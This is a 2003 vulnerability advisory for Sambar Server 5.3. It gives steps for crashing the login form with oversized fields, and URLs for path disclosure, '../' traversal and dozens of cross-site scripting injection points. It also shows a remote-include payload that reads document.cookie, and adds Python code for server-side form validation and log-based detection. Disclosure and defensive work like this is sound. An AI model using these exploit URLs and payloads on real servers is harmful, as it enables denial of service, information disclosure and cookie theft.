6th Apr 2003 [SBWID-6108]
COMMAND
	Sambar Server buffer overflow and sample cgi / script vulnerabilities
SYSTEMS AFFECTED
	 All Sambar Server systems with sysuser login included (buffer overflow)
	 Sambar 5.3 and prior (script vulns)
PROBLEM
	 1 Buffer overflow
	 =================
	Lorenzo   Manuel   Hernandez   Garcia-Hierro   [[email protected]]
	[http://www.lorenzohgh.com] found :
	This vulnerability is caused because the Sambar Server daemon doesn't
	examine the buffer and sizes of the login form transfer; the only
	protection for the server is the values in the form in the HTML code
	(the max value of the RCPassword input). This can be a vulnerability if
	the server is public-exposed and the directories of the sysuser are
	known.
	 METHOD TO EXPLOIT IT:
	You must be sure and know the true path (at the Sambar root, like
	c:\sambar) of the sysuser login form; now follow these easy steps:
	1st: go to the webserver sysuser login form path, like
	http://localhost/sysuser/index.stm (you must specify index.stm for the
	RPC called locally through index.stm).
	2nd: copy and paste the code of the form (total page) into a blank text
	file, and rename it to something.html.
	3rd: put in the correct fields the http://localhost or URL of your
	Sambar server installation; this is for the form and images. Of course,
	the form must connect to the correct URL address of the server script.
	The code goes like this:
	
	[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"]
	[INPUT TYPE=hidden NAME="RCpage"
	VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
	[INPUT TYPE=hidden NAME="onfailure"
	VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more buffer overflow, like to a cgi script (this can be a DoS attack)
	[INPUT TYPE=hidden NAME="start" VALUE="1"]
	[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
	[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
	[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
	[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
	[INPUT TYPE=hidden NAME="RCScount" VALUE="25"]
	[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
	[INPUT TYPE=hidden NAME="RCSpath" VALUE="/"]
	[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/"] *This is the problem!*
	[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"] *This is the problem!*
	[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name"]
	
	4th: now you can try to refresh and log in; use a valid user and
	password if you want to prove vulnerability number one, or go to the
	6th step!
	5th: now you must push the submit button, wait, and if you are running
	the server on your computer the server picks up and becomes unstable;
	if you continue sending these attempts the server must be restarted or
	the computer restarted during the attack!
	6th: the second vulnerability is the buffer overflow in the password
	form fields (you can learn more about this in the Allaire advisory
	'ColdFusion Buffer OverFlow in form fields'); you can insert more than
	a million characters and submit it, but you must edit the form code on
	your computer:
	
	[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this  to...
	[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than hundred thousand  characters"] 
	
	and.......... 7th: push on submit and the server picks up too!
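	The report above turns on one fact: the only limit on the password field was the MAXLENGTH attribute in the HTML, and a copy of the form saved on the client's machine can drop it. The following is an added example, not code from the advisory or from Sambar, of the check a login handler has to do itself: bound the body size, bound the number of fields, and bound each field's length before any value is used. The field name RCuser, the limits other than the 40 for RCpwd, and the body ceiling are assumptions for the example.

```python
"""Server-side form limits (added example, not Sambar's code).
A browser-side MAXLENGTH is advisory only; the server re-checks."""
from urllib.parse import parse_qsl, urlencode

# Per-field limits.  The 40 for RCpwd is the MAXLENGTH quoted in the
# advisory; RCuser and the other values are constructed assumptions.
FIELD_LIMITS = {"RCuser": 64, "RCpwd": 40, "RCpage": 512, "onfailure": 512}
MAX_BODY_BYTES = 8192        # assumption: generous ceiling for a login POST
MAX_FIELDS = 32              # assumption: cap on the number of name=value pairs


class FormRejected(ValueError):
    """Raised before any field reaches the application."""


def parse_login_form(content_length, body):
    """Validate a POST body for the login handler.

    content_length is the Content-Length header as an int; body is the
    raw bytes read.  Returns a dict of accepted fields or raises
    FormRejected.  Every check happens before a value is used.
    """
    # 1. Refuse to buffer an oversize body, and compare the declared
    #    length with the bytes received so a lying header is caught too.
    if content_length < 0 or content_length > MAX_BODY_BYTES:
        raise FormRejected(f"Content-Length {content_length} exceeds {MAX_BODY_BYTES}")
    if len(body) != content_length:
        raise FormRejected("body length does not match Content-Length")
    # 2. Parse with a hard cap on the number of pairs; parse_qsl raises
    #    ValueError when max_num_fields is exceeded.
    try:
        pairs = parse_qsl(body.decode("ascii"), keep_blank_values=True,
                          max_num_fields=MAX_FIELDS)
    except (UnicodeDecodeError, ValueError) as exc:
        raise FormRejected(f"malformed form body: {exc}") from exc
    fields = {}
    for name, value in pairs:
        # 3. Field names the handler does not know are dropped, not stored.
        if name not in FIELD_LIMITS:
            continue
        # 4. The real length limit lives here, not in the HTML.
        if len(value) > FIELD_LIMITS[name]:
            raise FormRejected(f"field {name} longer than {FIELD_LIMITS[name]}")
        fields[name] = value
    for required in ("RCuser", "RCpwd"):
        if required not in fields:
            raise FormRejected(f"missing field {required}")
    return fields


def encode_form(**fields):
    """Build a body the way a browser would (constructed test input)."""
    return urlencode(fields).encode("ascii")


def check(body):
    """Return 'accepted' or 'rejected: <reason>' for a body."""
    try:
        parse_login_form(len(body), body)
        return "accepted"
    except FormRejected as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    normal = encode_form(RCuser="admin", RCpwd="secret",
                         RCpage="/sysuser/desktop.stm")
    print(check(normal))                       # accepted
    # A locally edited form with MAXLENGTH removed can send any length.
    huge = encode_form(RCuser="admin", RCpwd="A" * 100_000)
    print(check(huge))                         # rejected: Content-Length ...
    # Under the body ceiling but over the per-field limit.
    medium = encode_form(RCuser="admin", RCpwd="A" * 41)
    print(check(medium))                       # rejected: field RCpwd longer than 40
```

	The body ceiling is checked against the header before the body is read, and the per-field limit is applied during parsing, so a request that passes the browser-side form but not the server's limits is dropped without the handler ever seeing the value.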
	 2 Scripts
	 =========
	Grégory Le Bras aka GaLiaRePt [http://www.Security-Corporation.com]
	says :
	
	 http://www.security-corp.org/index.php?ink=4-15-1
	 http://www.security-corporation.com/index.php?id=advisories&a=012-FR
	
	 • Path Disclosure :
	 ===================
	Sambar's default installation of the CGI bin directory contains a
	testcgi.exe and an environ.pl that allow remote users to view
	information regarding the operating system and the web server's
	directory. These vulnerabilities can be triggered by a remote user
	submitting a specially crafted HTTP request.
	- Exploits :
	
	http://[target]/cgi-bin/environ.pl
	http://[target]/cgi-bin/testcgi.exe
	
	Will produce the following output:
	
	- environ.pl : 
	--------------
	Sambar Server CGI Environment Variables 
	GATEWAY_INTERFACE: CGI/1.1 
	PATH_INFO: 
	PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
	QUERY_STRING: 
	REMOTE_ADDR: 127.0.0.1 
	REMOTE_HOST: 
	REMOTE_USER: 
	REQUEST_METHOD: GET 
	DOCUMENT_NAME: environ.pl 
	DOCUMENT_URI: /cgi-bin/environ.pl 
	SCRIPT_NAME: /cgi-bin/environ.pl 
	SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
	SERVER_NAME: localhost 
	SERVER_PORT: 80 
	SERVER_PROTOCOL: HTTP/1.1 
	SERVER_SOFTWARE: SAMBAR 
	CONTENT_LENGTH: 0 
	CONTENT: 
	- testcgi.exe :
	---------------
	Test CGI ... Version 1.00 [ build date 8-03-97 ]
	QUERY_STRING 
	PATH_INFO 
	PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
	SCRIPT_NAME /cgi-bin/testcgi.exe 
	SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
	DOCUMENT_ROOT C:/sambar53/docs/ 
	HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
	REMOTE_ADDR 127.0.0.1 
	REMOTE_HOST 
	SERVER_NAME localhost 
	SERVER_PROTOCOL HTTP/1.1 
	SERVER_SOFTWARE SAMBAR 
	CONTENT_TYPE 
	
	 • Directory Disclosure :
	 ========================
	Other security vulnerabilities were found in Sambar which allow an
	attacker to reveal the content of the files and directories on the web
	server, even if they should not be revealed.
	These vulnerabilities can be simply exploited by requesting a specially
	crafted URL utilizing the iecreate.stm and ieedit.stm applications with
	'../' appended.
	- Exploits :
	
	http://[target]/sysuser/docmgr/iecreate.stm?template=../
	http://[target]/sysuser/docmgr/ieedit.stm?url=../
	
	 • Cross Site Scripting :
	 ========================
	Many exploitable bugs were found on Sambar Server which cause script
	execution on the client's computer by following a crafted URL.
	This kind of attack, known as "Cross-Site Scripting Vulnerability", is
	present in many sections of the web site; an attacker can input
	specially crafted links and/or other malicious scripts.
	- Exploits :
	
	http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
	http://[target]/netutils/whodata.stm?sitename=[hostile_code]
	http://[target]/netutils/findata.stm?user=[hostile_code]
	http://[target]/netutils/findata.stm?host=[hostile_code]
	http://[target]/isapi/testisa.dll?check1=[hostile_code]
	http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
	http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
	http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
	http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
	http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
	http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
	http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
	http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
	http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
	http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
	http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
	http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
	http://[target]/cgi-bin/testcgi.exe?[hostile_code]
	
	- Another Cross Site Scripting can be exploited with a remote file
	which includes the hostile code, like this :
	
	http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm
	
	The hostile code could be :
	
	[script]alert("Cookie="+document.cookie)[/script]
	
	(open a window with the cookie of the visitor.)
	(replace [] by <>)
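	Until a fix exists, the practical response is to remove the sample scripts and watch the access log for the requests described in this section. The following is an added example, not code from the advisory, from Security-Corporation or from Sambar: it reads Common Log Format lines and flags the four patterns above, a request for either sample CGI, '../' (including double-encoded forms) in the docmgr parameters, script markup in the parameters of the listed pages, and ieedit.stm fetching its url= from a foreign host. The log lines, the 203.0.113.9 address and the LOCAL_HOSTS set are constructed for the example.

```python
"""Access-log triage for the Sambar sample-script issues (added example)."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Common Log Format; only the client address and request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints and parameter names taken from the advisory.
SAMPLE_CGIS = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
TRAVERSAL_PARAMS = {"template", "url", "path", "name"}
REFLECTING_PREFIXES = ("/netutils/", "/isapi/", "/cgi-bin/", "/samples/",
                       "/wwwping/", "/syshelp/", "/sysuser/docmgr/")
# Coarse markup heuristic: a few tag names, javascript: URLs, on*= handlers.
SCRIPT_MARKUP = re.compile(
    r"<\s*/?\s*(script|img|iframe|svg|body)\b|javascript:|\bon\w+\s*=", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}   # assumption: this server's own names


def classify(target, local_hosts=LOCAL_HOSTS):
    """Return [(rule, detail), ...] for one request target (path?query)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []
    if path in SAMPLE_CGIS:
        findings.append(("sample-cgi", path))
    # parse_qsl decodes one layer; two more passes reduce %252e%252e to '..'.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(unquote(value))
        if (path.startswith("/sysuser/docmgr/") and key in TRAVERSAL_PARAMS
                and ".." in value.replace("\\", "/")):
            findings.append(("path-traversal", f"{key}={value}"))
        # testcgi.exe echoes the raw query, so the key is inspected as well.
        if path.startswith(REFLECTING_PREFIXES) and SCRIPT_MARKUP.search(f"{key}={value}"):
            findings.append(("xss-probe", f"{key}={value}"[:60]))
        if path.endswith("/ieedit.stm") and key == "url":
            host = urlsplit(value).hostname
            if host and host.lower() not in local_hosts:
                findings.append(("remote-include", value))
    return findings


def scan(lines):
    """Return a list of {ip, rule, detail} dicts for an iterable of CLF lines."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            out.append({"ip": "?", "rule": "unparsed", "detail": line.strip()[:60]})
            continue
        for rule, detail in classify(m.group("target")):
            out.append({"ip": m.group("ip"), "rule": rule, "detail": detail})
    return out


def count_by_rule(lines):
    """Count findings per rule, handy for a daily summary."""
    return dict(Counter(f["rule"] for f in scan(lines)))


# Constructed sample log; the timestamps and addresses are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Apr/2003:10:00:01 +0000] "GET /cgi-bin/environ.pl HTTP/1.1" 200 512',
    '10.0.0.5 - - [06/Apr/2003:10:00:02 +0000] "GET /sysuser/docmgr/iecreate.stm?template=../ HTTP/1.1" 200 2048',
    '10.0.0.5 - - [06/Apr/2003:10:00:03 +0000] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900',
    '10.0.0.5 - - [06/Apr/2003:10:00:04 +0000] "GET /sysuser/docmgr/ieedit.stm?url=http://203.0.113.9/hostile_file.htm HTTP/1.1" 200 700',
    '192.168.1.20 - - [06/Apr/2003:10:00:05 +0000] "GET /index.stm HTTP/1.1" 200 3000',
    '10.0.0.5 - - [06/Apr/2003:10:00:06 +0000] "GET /cgi-bin/testcgi.exe?%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 400',
    '10.0.0.5 - - [06/Apr/2003:10:00:07 +0000] "GET /sysuser/docmgr/ieedit.stm?url=%252e%252e/ HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['ip']:15} {finding['rule']:15} {finding['detail']}")
    print(count_by_rule(SAMPLE_LOG))
```

	Two design points: the path is lower-cased and percent-decoded before comparison because the server is a Windows host, and the docmgr parameters are decoded twice beyond what parse_qsl already does so that a double-encoded '../' is not missed. The markup heuristic is deliberately coarse; tune REFLECTING_PREFIXES to the pages actually deployed to keep noise down.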
SOLUTION
	None yet